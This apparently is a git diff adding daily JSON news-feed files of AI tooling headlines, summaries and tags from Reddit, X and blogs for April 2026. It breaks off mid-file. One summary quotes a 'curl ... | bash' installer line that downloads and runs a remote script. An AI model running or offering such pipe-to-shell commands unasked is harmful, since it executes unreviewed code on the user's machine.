"https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-18T20:07:31.000Z", + "summary": "FOR THE UNINITIATED:\n\nGHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. No Linux, no complex WSL2 setups, and no driver hacking required.\n\nKEY FEATURES\n\nFull Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer.\n\nAuto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture ", + "category": "ai_models" + }, + { + "title": "easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-18T14:13:28.000Z", + "summary": "https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d\n\nI have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use.\n\nHaving worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. For o", + "category": "ai_research" + }, + { + "title": "We’re proud to open-source LIDARLearn [R] [D] [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-18T10:36:59.000Z", + "summary": "It’s a unified PyTorch library for 3D point cloud deep learning. To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support.\n\nIt brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods.\n\nYou can run everything from a single YAML file with one simple command.\n\nOne of the best features: after training, you can automatically generate a publica", + "category": "ai_research" + }, + { + "title": "Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-18T01:03:58.000Z", + "summary": "I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix\n\n**Hardware:** Apple M3 Ultra, 256GB unified memory\n\n**Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK\n\n**Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B\n\n# The Agent Compatibility Matrix\n\nThis is the part I wish ", + "category": "ai_models" + }, + { + "title": "gpt can now control your entire computer like a humain", + "url": "https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/", + "source": "Reddit r/ChatGPT", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-17T23:55:34.000Z", + "summary": "Hey everyone, I built something called AriaOS and just open-sourced it. \n\nThe idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment.\n\nWhat made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local", + "category": "ai_tools" + }, + { + "title": "ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.", + "url": "https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/", + "source": "Reddit r/ChatGPT", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.94, + "date": "2026-04-18T19:39:29.000Z", + "summary": "You've probably asked ChatGPT a question about a game you're playing -- \"is this item worth keeping in D2R,\" \"why is my Factorio base bottlenecked,\" \"how does this card interaction work in Magic,\" -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense.\n\nI built **Savecraft** to fix that. It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess.\n\nFor example:\n\n* *", + "category": "ai_tools" + }, + { + "title": "Goose v1.31.0 released", + "url": "https://github.com/aaif-goose/goose/releases/tag/v1.31.0", + "source": "GitHub Releases · Goose", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.76, + "date": "2026-04-17T00:44:54.000Z", + "summary": "New version of Goose available.", + "category": "ai_tools" + }, + { + "title": "Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-18T19:37:17.000Z", + "summary": "Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users.\n\nHere's my docker compose file:\n\n services:\n vllm:\n image: vllm/vllm-openai:latest\n container_name: vllm\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n count: all\n capabilities: [gpu]\n environment:\n - VLLM_API_KEY", + "category": "ai_models" + }, + { + "title": "Are you guys actually using local tool calling or is it a collective prank?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-18T18:54:54.000Z", + "summary": "I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol\n\n \nQwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works.\n\n \nToday with Gemma4, it kept assuring me it cr", + "category": "ai_models" + }, + { + "title": "Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-18T18:27:30.000Z", + "summary": "Quick update on Lore, the local-first memory app I posted here around v0.1.0.\n\nIt's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine.\n\n\n\nv0.2.0 highlights:\n\n\n\n\\- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls\n\n in real time.\n\n\\- Embedding-model migration is now non-destructive. You can swap from\n\n nomic-embed to mxbai-embed (or whatever) without losing data; the new\n\n embeddingTableSync rebuilds in place ", + "category": "ai_models" + }, + { + "title": "EditAnything IC-LoRA - LTX-2.3", + "url": "https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-18T15:07:01.000Z", + "summary": "This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints.\n\nThe current goal is not final polished production quality, but to explore:\n\n* edit-anything behavior\n* prompt-following\n* inference tradeoffs\n* synthetic dataset building, especially for **style data**\n\nThe model was trained around four mai", + "category": "creative_tools" + }, + { + "title": "Melodic Brotherhood - I Just Need to Know (video generated with open source tools)", + "url": "https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-18T14:30:57.000Z", + "summary": "Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing).\n\nOnly non-open source thing is the music, which is Suno.", + "category": "creative_tools" + }, + { + "title": "Has PP improved enough on m5 max to go for 128gb?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-18T14:28:50.000Z", + "summary": "Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models.\n\nThinking of upgrading to m5 max, just wondering what the sweet spot is for ram? Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding?", + "category": "ai_models" + }, + { + "title": "Built a program to track logistical intelligence using satellite data [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/", + "source": "Reddit r/MachineLearning", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-18T11:33:14.000Z", + "summary": "Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts.\n\nBut there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery.\n\nThe trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart.\n\nEverything stationary looks nor", + "category": "ai_research" + }, + { + "title": "Is there something like SETI for training open source models?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-18T11:30:33.000Z", + "summary": "Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think.\n\nWould it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? Is that a stupid idea?", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-19.json b/data/news-feed-2026-04-19.json new file mode 100644 index 0000000..548f97b --- /dev/null +++ b/data/news-feed-2026-04-19.json @@ -0,0 +1,245 @@ +{ + "generated": "2026-06-05T00:44:35.079Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-19", + "article_count": 15, + "archived_story_count": 579, + "articles": [ + { + "title": "whats the best harness/app to use my llm with?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-19T12:08:16.000Z", + "summary": "would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app\n\nlooking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model.\n\nseeing things like hermes? cherry studio? good ol LM studio?", + "category": "ai_models" + }, + { + "title": "I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative quality", + "url": "https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-19T01:59:17.000Z", + "summary": "# Sum B+a+c+k+g+r+o+u+n+d:\n\nI've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. I set their dimne", + "category": "ai_models" + }, + { + "title": "ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.", + "url": "https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-19T11:25:49.000Z", + "summary": "To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference.\n\nOutput images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA.\n\nPrompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl", + "category": "creative_tools" + }, + { + "title": "How would you describe the Midjourney look and why does it have one?", + "url": "https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/", + "source": "Reddit r/midjourney", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-19T10:16:50.000Z", + "summary": "I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. The con is that it’s very hard to use in any professional setting other", + "category": "creative_tools" + }, + { + "title": "I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design", + "url": "https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-19T09:53:47.000Z", + "summary": "Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry.\n\nSo I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r", + "category": "ai_tools" + }, + { + "title": "Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents", + "url": "https://x.com/BonairoFi/status/2045823726919258175", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-19T14:55:13.955Z", + "summary": "Braygent's take on Elon endorsing OpenClaw for X API access. The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale.", + "category": "ai_tools" + }, + { + "title": "Vercel Got Breached — Roll Your Secrets Right Now", + "url": "https://x.com/vercel/status/2045865072074035664", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-19T14:55:13.955Z", + "summary": "Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel.", + "category": "ai_tools" + }, + { + "title": "Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day", + "url": "https://x.com/AmpereSh/status/2045866315496161601", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-19T14:55:13.955Z", + "summary": "Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week.", + "category": "ai_tools" + }, + { + "title": "Scoble Reshares Elon Musk's OpenClaw X API Endorsement", + "url": "https://x.com/Scobleizer/status/2045572824866398399", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-19T14:55:12.737Z", + "summary": "Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community.", + "category": "ai_tools" + }, + { + "title": "Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-19T14:24:42.000Z", + "summary": "Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive.\n\nIf the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a ", + "category": "ai_research" + }, + { + "title": "RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-19T14:01:39.000Z", + "summary": "TL;DR: \n\nIf you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment?\n\nI’m currently at a crossroads and need some community wisdom. I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB.\n\nMy job is just needing to fine-tune with sma", + "category": "ai_models" + }, + { + "title": "Acceptable prompt processing speed for you?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-19T08:00:39.000Z", + "summary": "I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. \n\nFor agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good?", + "category": "ai_models" + }, + { + "title": "Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion", + "url": "https://www.latent.space/p/notion", + "source": "Latent Space", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 0.98, + "date": "2026-04-19T18:00:16.628Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Prepay for the Gemini API to get more control over your spend", + "url": "https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/", + "source": "Google AI Blog", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.94, + "date": "2026-04-19T18:00:09.702Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes", + "url": "https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash", + "source": "Rohan Paul", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.9, + "date": "2026-04-19T18:00:24.143Z", + "summary": null, + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-20.json b/data/news-feed-2026-04-20.json new file mode 100644 index 0000000..98273be --- /dev/null +++ b/data/news-feed-2026-04-20.json @@ -0,0 +1,251 @@ +{ + "generated": "2026-06-05T00:44:35.244Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-20", + "article_count": 15, + "archived_story_count": 503, + "articles": [ + { + "title": "PowerShell v7.6.0 released", + "url": "https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0", + "source": "GitHub Releases · PowerShell", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-18T18:49:57.000Z", + "summary": "## [7.6.0] - 2026-03-12\r\n\r\n### General Cmdlet Updates and Fixes\r\n\r\n- Update PowerShell Profile DSC resource manifests to allow `null` for content (#26973)\r\n\r\n### Tests\r\n\r\n- Add GitHub Actions annotations for Pester test failures (#26969)\r\n- Fix `Import-Module.Tests.ps1` to handle Arm32 platform (#26888)\r\n\r\n### Build and Packaging Improvements\r\n\r\n
      \r\n\r\n\r\n\r\n

      Update to .NET SDK 10.0.201

      \r\n\r\n
      \r\n\r\n
        \r\n
      • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041)\r\n\r\n\r\n\r\n

        Update to .NET SDK 10.0.202

        \r\n\r\n
        \r\n\r\n
          \r\n
        • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
        • \r\n
        • Update branch for release (#27287)
        • \r\n
        • Fix package pipeline by adding in PDP-Media direct", + "category": "ai_tools" + }, + { + "title": "Perplexity Computer Just Launched — OpenClaw for the Rest of Us", + "url": "https://x.com/davidlee/status/2046589300188598440", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-21T14:56:45.085Z", + "summary": "Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption.", + "category": "ai_tools" + }, + { + "title": "Open source Image Generation CLI. One binary.", + "url": "https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-21T00:37:35.000Z", + "summary": "I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs.\n\nIt uses diffusers underneath. The CLI is Rust, the GPU worker is Python. One binary, no Docker required.\n\nWhat it looks like:\n\n\\# Install\n\ncurl -fsSL https://modl.run/install | bash\n\n\\# Pu", + "category": "creative_tools" + }, + { + "title": "@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker", + "url": "https://x.com/LumaLabsAI/status/2046356064187363368", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-20T23:53:38.094Z", + "summary": "Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills.", + "category": "ai_tools" + }, + { + "title": "I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent", + "url": "https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-21T17:52:07.000Z", + "summary": "I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused.\n\nThat made sense at the start. Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow.\n\nBut after building a few integrations, I kept running into the same uncomfortable question:\n\nIf I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C", + "category": "ai_tools" + }, + { + "title": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", + "url": "https://x.com/Ali_TongyiLab/status/2044771299483107739", + "source": "X / @ali_tongyilab", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-16T13:34:02.000Z", + "summary": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", + "category": "ai_tools" + }, + { + "title": "Open source CRT animation lora for ltx 2.3", + "url": "https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-20T16:22:01.000Z", + "summary": "None of the video gen models do a real CRT terminal animation look.\n\nWeights + recipe:\n\n🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora)", + "category": "creative_tools" + }, + { + "title": "LinkedIn Launched Blind AI Model Comparison — Finally a Practical Evaluation Tool", + "url": "https://x.com/DataconomyMedia/status/2046589880226996228", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-21T14:56:45.085Z", + "summary": "Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers.", + "category": "ai_tools" + }, + { + "title": "Scoble: I Took My AI to Stanford — It Has My Personality Now", + "url": "https://x.com/Scobleizer/status/2046495684493562130", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-21T14:55:24.550Z", + "summary": "Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality.", + "category": "ai_tools" + }, + { + "title": "I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com", + "url": "https://x.com/Scobleizer/status/2046194231321190735", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-20T23:50:37.016Z", + "summary": "Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon.", + "category": "ai_tools" + }, + { + "title": "[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)", + "url": "https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds", + "source": "Latent Space", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.9, + "date": "2026-04-21T06:00:30.085Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Framework Laptop 13 Pro", + "url": "https://frame.work/laptop13pro", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.8899999999999999, + "date": "2026-04-21T18:00:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?", + "url": "https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.87, + "date": "2026-04-21T14:30:07.000Z", + "summary": "Hi everyone,\n\nI really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup.\n\nRight now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance?\n\nI just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations ", + "category": "creative_tools" + }, + { + "title": "ComfyUI + CUDA + Docker in a single command", + "url": "https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.8600000000000001, + "date": "2026-04-21T14:06:06.000Z", + "summary": "What's up everyone! So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything.\n\nThe goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA:\n\n* Uses NVIDIA Container Toolkit for GPU passthrough\n* Persistent storage via a Docker volume\n* No modifications to ComfyUI itself\n* G", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-22.json b/data/news-feed-2026-04-22.json new file mode 100644 index 0000000..5addd58 --- /dev/null +++ b/data/news-feed-2026-04-22.json @@ -0,0 +1,247 @@ +{ + "generated": "2026-06-05T00:44:35.627Z", + "generatedBy": "Studio news backfill", + "site": "Stack 